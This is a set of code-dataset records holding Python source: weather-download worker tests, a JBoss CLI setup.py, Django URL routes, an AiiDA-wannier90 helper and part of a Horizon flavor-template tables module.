worker.cli.parser._actions[6].dest == \"no_verify_certs\"\n assert worker.cli.parser._actions[6].default is False\n assert worker.cli.parser._actions[6].help\n\n\nclass TestConfig:\n \"\"\"Unit tests for production YAML config file elements related to worker.\"\"\"\n\n def test_message_registry(self, prod_config):\n assert \"download_weather\" in prod_config[\"message registry\"][\"workers\"]\n msg_registry = prod_config[\"message registry\"][\"workers\"][\"download_weather\"]\n assert msg_registry[\"checklist key\"] == \"weather forecast\"\n\n def test_message_registry_keys(self, prod_config):\n msg_registry = prod_config[\"message registry\"][\"workers\"][\"download_weather\"]\n assert list(msg_registry.keys()) == [\n \"checklist key\",\n \"success 2.5km 00\",\n \"failure 2.5km 00\",\n \"success 2.5km 06\",\n \"failure 2.5km 06\",\n \"success 2.5km 12\",\n \"failure 2.5km 12\",\n \"success 2.5km 18\",\n \"failure 2.5km 18\",\n \"success 1km 00\",\n \"failure 1km 00\",\n \"success 1km 12\",\n \"failure 1km 12\",\n \"crash\",\n ]\n\n def test_file_group(self, prod_config):\n assert \"file group\" in prod_config\n assert prod_config[\"file group\"] == \"sallen\"\n\n def test_weather_download_2_5_km_section(self, prod_config):\n weather_download = prod_config[\"weather\"][\"download\"][\"2.5 km\"]\n assert (\n weather_download[\"GRIB dir\"]\n == \"/results/forcing/atmospheric/continental2.5/GRIB/\"\n )\n assert (\n weather_download[\"url template\"]\n == \"https://hpfx.collab.science.gc.ca/{date}/WXO-DD/model_hrdps/continental/2.5km/{forecast}/{hour}/{filename}\"\n )\n assert (\n weather_download[\"ECCC file template\"]\n == \"{date}T{forecast}Z_MSC_HRDPS_{variable}_RLatLon0.0225_PT{hour}H.grib2\"\n )\n assert weather_download[\"forecast duration\"] == 48\n assert weather_download[\"variables\"] == [\n [\"UGRD_AGL-10m\", \"u10\", \"u_wind\"],\n [\"VGRD_AGL-10m\", \"v10\", \"v_wind\"],\n [\"DSWRF_Sfc\", \"ssrd\", \"solar\"],\n [\"DLWRF_Sfc\", \"strd\", \"therm_rad\"],\n [\"LHTFL_Sfc\", \"lhtfl\", \"LHTFL_surface\"],\n [\"TMP_AGL-2m\", \"t2m\", \"tair\"],\n [\"SPFH_AGL-2m\", \"sh2\", \"qair\"],\n [\"RH_AGL-2m\", \"r2\", \"RH_2maboveground\"],\n [\"APCP_Sfc\", \"unknown\", \"precip\"],\n [\"PRATE_Sfc\", \"prate\", \"PRATE_surface\"],\n [\"PRMSL_MSL\", \"prmsl\", \"atmpres\"],\n ]\n\n def test_weather_download_1_km_section(self, prod_config):\n weather_download = prod_config[\"weather\"][\"download\"][\"1 km\"]\n assert (\n weather_download[\"GRIB dir\"] == \"/results/forcing/atmospheric/GEM1.0/GRIB/\"\n )\n assert (\n weather_download[\"url template\"]\n == \"https://dd.alpha.meteo.gc.ca/model_hrdps/west/1km/grib2/{forecast}/{hour}/{filename}\"\n )\n assert (\n weather_download[\"ECCC file template\"]\n == \"CMC_hrdps_west_{variable}_rotated_latlon0.009x0.009_{date}T{forecast}Z_P{hour}-00.grib2\"\n )\n assert weather_download[\"forecast duration\"] == 36\n assert weather_download[\"variables\"] == [\n \"UGRD_TGL_10\",\n \"VGRD_TGL_10\",\n \"DSWRF_SFC_0\",\n \"DLWRF_SFC_0\",\n \"LHTFL_SFC_0\",\n \"TMP_TGL_2\",\n \"SPFH_TGL_2\",\n \"RH_TGL_2\",\n \"APCP_SFC_0\",\n \"PRATE_SFC_0\",\n \"PRMSL_MSL_0\",\n ]\n\n\n@pytest.mark.parametrize(\n \"forecast, resolution, forecast_date\",\n (\n (\"00\", \"2.5km\", \"2020-02-10\"),\n (\"06\", \"2.5km\", \"2020-02-10\"),\n (\"12\", \"2.5km\", \"2020-02-10\"),\n (\"18\", \"2.5km\", \"2020-02-10\"),\n (\"00\", \"1km\", \"2020-02-10\"),\n (\"12\", \"1km\", \"2020-02-10\"),\n ),\n)\nclass TestSuccess:\n \"\"\"Unit tests for success() function.\"\"\"\n\n def test_success(self, forecast, resolution, forecast_date, caplog):\n parsed_args = SimpleNamespace(\n forecast=forecast,\n resolution=resolution,\n run_date=forecast_date,\n no_verify_certs=False,\n )\n caplog.set_level(logging.DEBUG)\n\n msg_type = download_weather.success(parsed_args)\n\n assert caplog.records[0].levelname == \"INFO\"\n expected = f\"{forecast_date} {resolution} weather forecast {forecast} downloads complete\"\n assert caplog.messages[0] == expected\n assert msg_type == f\"success {resolution} {forecast}\"\n\n\n@pytest.mark.parametrize(\n \"forecast, resolution, forecast_date\",\n (\n (\"00\", \"1km\", \"2020-02-10\"),\n (\"12\", \"1km\", \"2020-02-10\"),\n (\"00\", \"2.5km\", \"2020-02-10\"),\n (\"06\", \"2.5km\", \"2020-02-10\"),\n (\"12\", \"2.5km\", \"2020-02-10\"),\n (\"18\", \"2.5km\", \"2020-02-10\"),\n ),\n)\nclass TestFailure:\n \"\"\"Unit tests for failure() function.\"\"\"\n\n def test_failure(self, forecast, resolution, forecast_date, caplog):\n parsed_args = SimpleNamespace(\n forecast=forecast,\n resolution=resolution,\n run_date=forecast_date,\n no_verify_certs=False,\n )\n caplog.set_level(logging.DEBUG)\n\n msg_type = download_weather.failure(parsed_args)\n\n assert caplog.records[0].levelname == \"CRITICAL\"\n expected = f\"{forecast_date} {resolution} weather forecast {parsed_args.forecast} downloads failed\"\n assert caplog.messages[0] == expected\n assert msg_type == f\"failure {resolution} {forecast}\"\n\n\n@patch(\"nowcast.workers.download_weather.lib.mkdir\", autospec=True)\n@patch(\"nowcast.workers.download_weather.lib.fix_perms\", autospec=True)\n@patch(\"nowcast.workers.download_weather._get_file\", autospec=True)\nclass TestGetGrib:\n \"\"\"Unit tests for get_grib() function.\"\"\"\n\n @pytest.mark.parametrize(\n \"forecast, resolution\",\n (\n (\"00\", \"2.5km\"),\n (\"06\", \"2.5km\"),\n (\"12\", \"2.5km\"),\n (\"18\", \"2.5km\"),\n ),\n )\n def test_make_hour_dirs_2_5km(\n self,\n m_get_file,\n m_fix_perms,\n m_mkdir,\n forecast,\n resolution,\n config,\n ):\n parsed_args = SimpleNamespace(\n forecast=forecast,\n resolution=resolution,\n run_date=arrow.get(\"2023-02-24\"),\n no_verify_certs=False,\n )\n p_config = patch.dict(\n config[\"weather\"][\"download\"][resolution.replace(\"km\", \" km\")],\n {\"forecast duration\": 6},\n )\n\n with p_config:\n download_weather.get_grib(parsed_args, config)\n\n for hr in range(1, 7):\n args, kwargs = m_mkdir.call_args_list[hr + 1]\n expected = f\"/results/forcing/atmospheric/continental{float(resolution[:-2]):.1f}/GRIB/20230224/{forecast}/00{hr}\"\n assert args[0] == expected\n assert kwargs == {\"grp_name\": \"allen\", \"exist_ok\": False}\n\n @pytest.mark.parametrize(\n \"forecast, resolution\",\n (\n (\"00\", \"1km\"),\n (\"12\", \"1km\"),\n ),\n )\n def test_make_hour_dirs_1km(\n self,\n m_get_file,\n m_fix_perms,\n m_mkdir,\n forecast,\n resolution,\n config,\n ):\n parsed_args = SimpleNamespace(\n forecast=forecast,\n resolution=resolution,\n run_date=arrow.get(\"2023-02-24\"),\n no_verify_certs=False,\n )\n p_config = patch.dict(\n config[\"weather\"][\"download\"][resolution.replace(\"km\", \" km\")],\n {\"forecast duration\": 6},\n )\n\n with p_config:\n download_weather.get_grib(parsed_args, config)\n\n for hr in range(1, 7):\n args, kwargs = m_mkdir.call_args_list[hr + 1]\n expected = f\"/results/forcing/atmospheric/GEM{float(resolution[:-2]):.1f}/GRIB/20230224/{forecast}/00{hr}\"\n assert args[0] == expected\n assert kwargs == {\"grp_name\": \"allen\", \"exist_ok\": False}\n\n @pytest.mark.parametrize(\n \"forecast, resolution, variables\",\n (\n (\"00\", \"1km\", \"UGRD_TGL_10\"),\n (\"12\", \"1km\", \"UGRD_TGL_10\"),\n (\"00\", \"2.5km\", [\"UGRD_AGL-10m\", \"u10\", \"u_wind\"]),\n (\"06\", \"2.5km\", [\"UGRD_AGL-10m\", \"u10\", \"u_wind\"]),\n (\"12\", \"2.5km\", [\"UGRD_AGL-10m\", \"u10\", \"u_wind\"]),\n (\"18\", \"2.5km\", [\"UGRD_AGL-10m\", \"u10\", \"u_wind\"]),\n ),\n )\n @patch(\"nowcast.workers.download_weather.requests.Session\", autospec=True)\n def test_get_grib_variable_file(\n self,\n m_session,\n m_get_file,\n m_fix_perms,\n m_mkdir,\n forecast,\n resolution,\n variables,\n config,\n ):\n parsed_args = SimpleNamespace(\n forecast=forecast,\n resolution=resolution,\n run_date=arrow.get(\"2023-02-24\"),\n no_verify_certs=False,\n )\n p_config = patch.dict(\n config[\"weather\"][\"download\"][resolution.replace(\"km\", \" km\")],\n {\"variables\": [variables], \"forecast duration\": 1},\n )\n\n with p_config:\n download_weather.get_grib(parsed_args, config)\n\n args, kwargs = m_get_file.call_args\n variable = variables[0] if resolution == \"2.5km\" else variables\n assert args == (\n config[\"weather\"][\"download\"][resolution.replace(\"km\", \" km\")][\n \"url template\"\n ],\n config[\"weather\"][\"download\"][resolution.replace(\"km\", \" km\")][\n \"ECCC file template\"\n ],\n variable,\n config[\"weather\"][\"download\"][resolution.replace(\"km\", \" km\")][\"GRIB dir\"],\n \"20230224\",\n forecast,\n \"001\",\n m_session().__enter__(),\n )\n assert kwargs == {}\n\n @pytest.mark.parametrize(\n \"forecast, resolution, variable\",\n (\n (\"00\", \"1km\", \"UGRD_TGL_10\"),\n (\"12\", \"1km\", \"UGRD_TGL_10\"),\n (\"00\", \"2.5km\", \"UGRD_AGL-10m\"),\n (\"06\", \"2.5km\", \"UGRD_AGL-10m\"),\n (\"12\", \"2.5km\", \"UGRD_AGL-10m\"),\n (\"18\", \"2.5km\", \"UGRD_AGL-10m\"),\n ),\n )\n def test_fix_perms(\n self,\n m_get_file,\n m_fix_perms,\n m_mkdir,\n forecast,\n resolution,\n variable,\n config,\n ):\n parsed_args = SimpleNamespace(\n forecast=forecast,\n resolution=resolution,\n run_date=arrow.get(\"2023-02-24\"),\n no_verify_certs=False,\n )\n p_config = patch.dict(\n config[\"weather\"][\"download\"][resolution.replace(\"km\", \" km\")],\n {\"variables\": [variable], \"forecast duration\": 1},\n )\n m_get_file.return_value = \"filepath\"\n p_fix_perms = patch(\"nowcast.workers.download_weather.lib.fix_perms\")\n\n with p_config, p_fix_perms as m_fix_perms:\n download_weather.get_grib(parsed_args, config)\n\n m_fix_perms.assert_called_once_with(\"filepath\")\n\n @pytest.mark.parametrize(\n \"forecast, resolution\",\n (\n (\"00\", \"2.5km\"),\n (\"06\", \"2.5km\"),\n (\"12\", \"2.5km\"),\n (\"18\", \"2.5km\"),\n ),\n )\n def test_checklist_2_5km(\n self,\n m_get_file,\n m_fix_perms,\n m_mkdir,\n forecast,\n resolution,\n config,\n ):\n parsed_args = SimpleNamespace(\n forecast=forecast,\n resolution=resolution,\n run_date=arrow.get(\"2023-02-24\"),\n no_verify_certs=False,\n )\n\n checklist = download_weather.get_grib(parsed_args, config)\n\n expected = {\n f\"{forecast} {resolution}\": f\"/results/forcing/atmospheric/continental{float(resolution[:-2]):.1f}/GRIB/20230224/{forecast}\"\n }\n assert checklist == expected\n\n @pytest.mark.parametrize(\n \"forecast, resolution\",\n (\n (\"00\", \"1km\"),\n (\"12\", \"1km\"),\n ),\n )\n def test_checklist_1km(\n self,\n m_get_file,\n m_fix_perms,\n m_mkdir,\n forecast,\n resolution,\n config,\n ):\n parsed_args = SimpleNamespace(\n forecast=forecast,\n resolution=resolution,\n run_date=arrow.get(\"2023-02-24\"),\n no_verify_certs=False,\n )\n\n checklist = download_weather.get_grib(parsed_args, config)\n\n expected = {\n f\"{forecast} {resolution}\": f\"/results/forcing/atmospheric/GEM{float(resolution[:-2]):.1f}/GRIB/20230224/{forecast}\"\n }\n assert checklist == expected\n\n\n@patch(\"nowcast.workers.download_weather.lib.mkdir\", autospec=True)\nclass TestMkdirs:\n \"\"\"Unit tests for _mkdirs() function.\"\"\"\n\n def test_make_date_dir(self, m_mkdir):\n download_weather._mkdirs(\"/tmp\", \"20150618\", \"06\", \"foo\")\n args, kwargs = m_mkdir.call_args_list[0]\n assert args[0] == \"/tmp/20150618\"\n assert kwargs == {\"grp_name\": \"foo\"}\n\n def test_make_forecast_dir(self, m_mkdir):\n download_weather._mkdirs(\"/tmp\", \"20150618\", \"06\", \"foo\")\n args, kwargs = m_mkdir.call_args_list[1]\n assert args[0] == \"/tmp/20150618/06\"\n assert kwargs == {\"grp_name\": \"foo\", \"exist_ok\": False}\n\n\n@patch(\"nowcast.workers.download_weather.get_web_data\", autospec=True)\nclass TestGetFile:\n \"\"\"Unit tests for _get_file() function.\"\"\"\n\n @pytest.mark.parametrize(\n \"resolution, variable\",\n (\n (\"1 km\", \"UGRD_TGL_10\"),\n (\"2.5 km\", \"UGRD_AGL-10m\"),\n ),\n )\n def test_get_web_data(\n self,\n m_get_web_data,\n resolution,\n variable,\n config,\n caplog,\n monkeypatch,\n ):\n def mock_stat(filepath):\n return SimpleNamespace(st_size=123_456)\n\n monkeypatch.setattr(download_weather.os, \"stat\", mock_stat)\n\n caplog.set_level(logging.DEBUG)\n\n download_weather._get_file(\n config[\"weather\"][\"download\"][resolution][\"url template\"],\n config[\"weather\"][\"download\"][resolution][\"ECCC file template\"],\n variable,\n config[\"weather\"][\"download\"][resolution][\"GRIB dir\"],\n \"20150619\",\n \"06\",\n \"001\",\n None,\n )\n\n filename = config[\"weather\"][\"download\"][resolution][\n \"ECCC file template\"\n ].format(variable=variable, date=\"20150619\", forecast=\"06\", hour=\"001\")\n url = config[\"weather\"][\"download\"][resolution][\"url template\"].format(\n date=\"20150619\", forecast=\"06\", hour=\"001\", filename=filename\n )\n filepath = Path(\n config[\"weather\"][\"download\"][resolution][\"GRIB dir\"],\n \"20150619\",\n \"06\",\n \"001\",\n filename,\n )\n\n m_get_web_data.assert_called_once_with(\n url,\n \"download_weather\",\n Path(filepath),\n session=None,\n wait_exponential_max=9000,\n )\n\n assert caplog.records[0].levelname == \"DEBUG\"\n assert caplog.messages[0] == f\"downloaded 123456 bytes from {url}\"\n\n @pytest.mark.parametrize(\"resolution\", (\"1 km\", \"2.5 km\"))\n def test_empty_file_exception(\n self,\n m_get_web_data,\n resolution,\n config,\n caplog,\n monkeypatch,\n ):\n def mock_stat(filepath):\n return SimpleNamespace(st_size=0)\n\n monkeypatch.setattr(download_weather.os, \"stat\", mock_stat)\n\n caplog.set_level(logging.DEBUG)\n\n with pytest.raises(download_weather.WorkerError):\n download_weather._get_file(\n config[\"weather\"][\"download\"][resolution][\"url template\"],\n config[\"weather\"][\"download\"][resolution][\"ECCC file template\"],\n \"UGRD_TGL_10\",\n config[\"weather\"][\"download\"][resolution][\"GRIB dir\"],\n \"20150619\",\n \"06\",\n \"001\",\n None,\n )\n\n assert caplog.records[0].levelname == \"DEBUG\"\n assert caplog.messages[0].startswith(\"downloaded 0 bytes from\")\n assert caplog.records[1].levelname == \"CRITICAL\"\n assert caplog.messages[1].startswith(\"Problem! 0 size file:\")\n", "sub_path": "tests/workers/test_download_weather.py", "file_name": "test_download_weather.py", "file_ext": "py", "file_size_in_byte": 22760, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "pathlib.Path", "line_number": 37, "usage_type": "call"}, {"api_name": "textwrap.dedent", "line_number": 40, "usage_type": "call"}, {"api_name": "nemo_nowcast.Config", "line_number": 85, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 34, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather", "line_number": 92, "usage_type": "argument"}, {"api_name": "pytest.fixture", "line_number": 90, "usage_type": "attribute"}, {"api_name": "nowcast.workers.download_weather.main", "line_number": 99, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather", "line_number": 99, "usage_type": "name"}, {"api_name": "nowcast.workers.download_weather.main", "line_number": 106, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather", "line_number": 106, "usage_type": "name"}, {"api_name": "nowcast.workers.download_weather.main", "line_number": 112, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather", "line_number": 112, "usage_type": "name"}, {"api_name": "nowcast.workers.download_weather.main", "line_number": 119, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather", "line_number": 119, "usage_type": "name"}, {"api_name": "nemo_nowcast.cli", "line_number": 121, "usage_type": "attribute"}, {"api_name": "arrow.now", "line_number": 123, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather.main", "line_number": 127, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather", "line_number": 127, "usage_type": "name"}, {"api_name": "types.SimpleNamespace", "line_number": 237, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 243, "usage_type": "attribute"}, {"api_name": "nowcast.workers.download_weather.success", "line_number": 245, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather", "line_number": 245, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 222, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 222, "usage_type": "attribute"}, {"api_name": "types.SimpleNamespace", "line_number": 268, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 274, "usage_type": "attribute"}, {"api_name": "nowcast.workers.download_weather.failure", "line_number": 276, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather", "line_number": 276, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 253, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 253, "usage_type": "attribute"}, {"api_name": "types.SimpleNamespace", "line_number": 308, "usage_type": "call"}, {"api_name": "arrow.get", "line_number": 311, "usage_type": "call"}, {"api_name": "unittest.mock.patch.dict", "line_number": 314, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 314, "usage_type": "name"}, {"api_name": "nowcast.workers.download_weather.get_grib", "line_number": 320, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather", "line_number": 320, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 290, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 290, "usage_type": "attribute"}, {"api_name": "types.SimpleNamespace", "line_number": 344, "usage_type": "call"}, {"api_name": "arrow.get", "line_number": 347, "usage_type": "call"}, {"api_name": "unittest.mock.patch.dict", "line_number": 350, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 350, "usage_type": "name"}, {"api_name": "nowcast.workers.download_weather.get_grib", "line_number": 356, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather", "line_number": 356, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 328, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 328, "usage_type": "attribute"}, {"api_name": "types.SimpleNamespace", "line_number": 387, "usage_type": "call"}, {"api_name": "arrow.get", "line_number": 390, "usage_type": "call"}, {"api_name": "unittest.mock.patch.dict", "line_number": 393, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 393, "usage_type": "name"}, {"api_name": "nowcast.workers.download_weather.get_grib", "line_number": 399, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather", "line_number": 399, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 364, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 364, "usage_type": "attribute"}, {"api_name": "unittest.mock.patch", "line_number": 375, "usage_type": "call"}, {"api_name": "types.SimpleNamespace", "line_number": 440, "usage_type": "call"}, {"api_name": "arrow.get", "line_number": 443, "usage_type": "call"}, {"api_name": "unittest.mock.patch.dict", "line_number": 446, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 446, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 451, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather.get_grib", "line_number": 454, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather", "line_number": 454, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 419, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 419, "usage_type": "attribute"}, {"api_name": "types.SimpleNamespace", "line_number": 476, "usage_type": "call"}, {"api_name": "arrow.get", "line_number": 479, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather.get_grib", "line_number": 483, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather", "line_number": 483, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 458, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 458, "usage_type": "attribute"}, {"api_name": "types.SimpleNamespace", "line_number": 506, "usage_type": "call"}, {"api_name": "arrow.get", "line_number": 509, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather.get_grib", "line_number": 513, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather", "line_number": 513, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 490, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 490, "usage_type": "attribute"}, {"api_name": "unittest.mock.patch", "line_number": 284, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 285, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 286, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather._mkdirs", "line_number": 526, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather", "line_number": 526, "usage_type": "name"}, {"api_name": "nowcast.workers.download_weather._mkdirs", "line_number": 532, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather", "line_number": 532, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 521, "usage_type": "call"}, {"api_name": "types.SimpleNamespace", "line_number": 559, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather.os", "line_number": 561, "usage_type": "attribute"}, {"api_name": "nowcast.workers.download_weather", "line_number": 561, "usage_type": "name"}, {"api_name": "logging.DEBUG", "line_number": 563, "usage_type": "attribute"}, {"api_name": "nowcast.workers.download_weather._get_file", "line_number": 565, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather", "line_number": 565, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 582, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 593, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 542, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 542, "usage_type": "attribute"}, {"api_name": "types.SimpleNamespace", "line_number": 611, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather.os", "line_number": 613, "usage_type": "attribute"}, {"api_name": "nowcast.workers.download_weather", "line_number": 613, "usage_type": "name"}, {"api_name": "logging.DEBUG", "line_number": 615, "usage_type": "attribute"}, {"api_name": "pytest.raises", "line_number": 617, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather.WorkerError", "line_number": 617, "usage_type": "attribute"}, {"api_name": "nowcast.workers.download_weather", "line_number": 617, "usage_type": "name"}, {"api_name": "nowcast.workers.download_weather._get_file", "line_number": 618, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather", "line_number": 618, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 601, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 601, "usage_type": "attribute"}, {"api_name": "unittest.mock.patch", "line_number": 538, "usage_type": "call"}]}
+{"seq_id": "318568945", "text": "from setuptools import setup, find_packages\n\nwith open(\"README.md\", 'r', encoding=\"utf-8\") as fh:\n long_description = fh.read()\nwith open(\"requirements.txt\", \"r\", encoding=\"utf-8\") as fh:\n requirements = fh.read()\n\nsetup(\n name=\"jbosscli\",\n version=\"0.0.1\",\n author=\"Sandeep C Kumar\",\n author_email=\"sandeepkchenna@gmail.com\",\n license=\"MIT License\",\n description=\"Jboss EAP 7 CLI Tool\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url='',\n py_modules=[\"jbosscli\", \"app\"],\n packages=find_packages(),\n install_requires=[requirements],\n python_requires='>=3.6',\n classifiers=[\n \"Programming Language :: Python :: 3.8\",\n \"Operating System :: OS Independent\",\n ],\n entry_points = \"\"\"\n [console_scripts]\n jbosscli=jbosscli:main\n \"\"\"\n)\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 848, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "setuptools.setup", "line_number": 8, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 19, "usage_type": "call"}]}
+{"seq_id": "608178659", "text": "from django.conf.urls import patterns, url, include\nfrom officespace import views\n\nurlpatterns = patterns('',\n url(r'^$', views.index, name='index'),\n url(r'^user/', include('oautherise.urls')),\n url(r'addspaces/$', views.addspace, name=\"addspace\"),\n url(r'info/(?P\\w+)/$', views.officespaceinfo, name='officespaceinfo'),\n url(r'message/(?P\\w+)/$', views.messag, name='messages'),\n url(r'messages/view/$', views.showmessages, name='showmessages'),\n url(r'userprofile/(?P\\w+)/$', views.userprofilename, name='userprofilename'),\n )\n", "sub_path": "officespace/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 619, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "django.conf.urls.patterns", "line_number": 4, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 5, "usage_type": "call"}, {"api_name": "officespace.views.index", "line_number": 5, "usage_type": "attribute"}, {"api_name": "officespace.views", "line_number": 5, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 6, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "officespace.views.addspace", "line_number": 7, "usage_type": "attribute"}, {"api_name": "officespace.views", "line_number": 7, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "officespace.views.officespaceinfo", "line_number": 8, "usage_type": "attribute"}, {"api_name": "officespace.views", "line_number": 8, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "officespace.views.messag", "line_number": 9, "usage_type": "attribute"}, {"api_name": "officespace.views", "line_number": 9, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "officespace.views.showmessages", "line_number": 10, "usage_type": "attribute"}, {"api_name": "officespace.views", "line_number": 10, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "officespace.views.userprofilename", "line_number": 11, "usage_type": "attribute"}, {"api_name": "officespace.views", "line_number": 11, "usage_type": "name"}]}
+{"seq_id": "409918886", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n################################################################################\n# Copyright (c), AiiDA team and individual contributors. #\n# All rights reserved. #\n# This file is part of the AiiDA-wannier90 code. #\n# #\n# The code is hosted on GitHub at https://github.com/aiidateam/aiida-wannier90 #\n# For further information on the license, see the LICENSE.txt file #\n################################################################################\n\nfrom __future__ import absolute_import\nfrom six.moves import zip\n\n__all__ = ('group_list', 'groups_to_string', 'list_to_grouped_string')\n\n\ndef group_list(values):\n values = sorted(values)\n groups = []\n if not values:\n return groups\n current_start = values[0]\n for v1, v2 in zip(values, values[1:]):\n # contiguous range\n if v2 - 1 <= v1:\n continue\n # break in the range\n else:\n groups.append(sorted(set([current_start, v1])))\n current_start = v2\n # final group\n groups.append(sorted(set([current_start, v2]))) # pylint: disable=undefined-loop-variable\n return groups\n\n\ndef groups_to_string(value_groups):\n return ','.join(\n '-'.join([str(g) for g in group]) for group in value_groups\n )\n\n\ndef list_to_grouped_string(values):\n return groups_to_string(group_list(values))\n", "sub_path": "aiida_wannier90/io/_group_list.py", "file_name": "_group_list.py", "file_ext": "py", "file_size_in_byte": 1577, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "six.moves.zip", "line_number": 24, "usage_type": "call"}]}
+{"seq_id": "567394034", "text": "# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport logging\n\nfrom django.utils.translation import ugettext_lazy as _ # noqa\n\nfrom horizon import tables\n\nfrom tuskar_ui import api as tuskar\nfrom tuskar_ui import tables as tuskar_tables\n\n\nLOG = logging.getLogger(__name__)\n\n\nclass DeleteFlavorTemplates(tables.DeleteAction):\n data_type_singular = _(\"Flavor Template\")\n data_type_plural = _(\"Flavor Templates\")\n\n def delete(self, request, obj_id):\n tuskar.FlavorTemplate.delete(request, obj_id)\n\n\nclass CreateFlavorTemplate(tables.LinkAction):\n name = \"create\"\n verbose_name = _(\"Create Flavor Template\")\n url = \"horizon:infrastructure:resource_management:flavor_templates:create\"\n classes = (\"ajax-modal\", \"btn-create\")\n\n\nclass EditFlavorTemplate(tables.LinkAction):\n name = \"edit\"\n verbose_name = _(\"Edit Flavor Template\")\n url = \"horizon:infrastructure:resource_management:flavor_templates:edit\"\n classes = (\"ajax-modal\", \"btn-edit\")\n\n\nclass FlavorTemplatesFilterAction(tables.FilterAction):\n\n def filter(self, table, flavor_templates, filter_string):\n \"\"\" Naive case-insensitive search. \"\"\"\n q = filter_string.lower()\n return [flavor_template for flavor_template in flavor_templates\n if q in flavor_template.name.lower()]\n\n\nclass FlavorTemplatesTable(tuskar_tables.DataTable):\n name = tuskar_tables.Column('name',\n 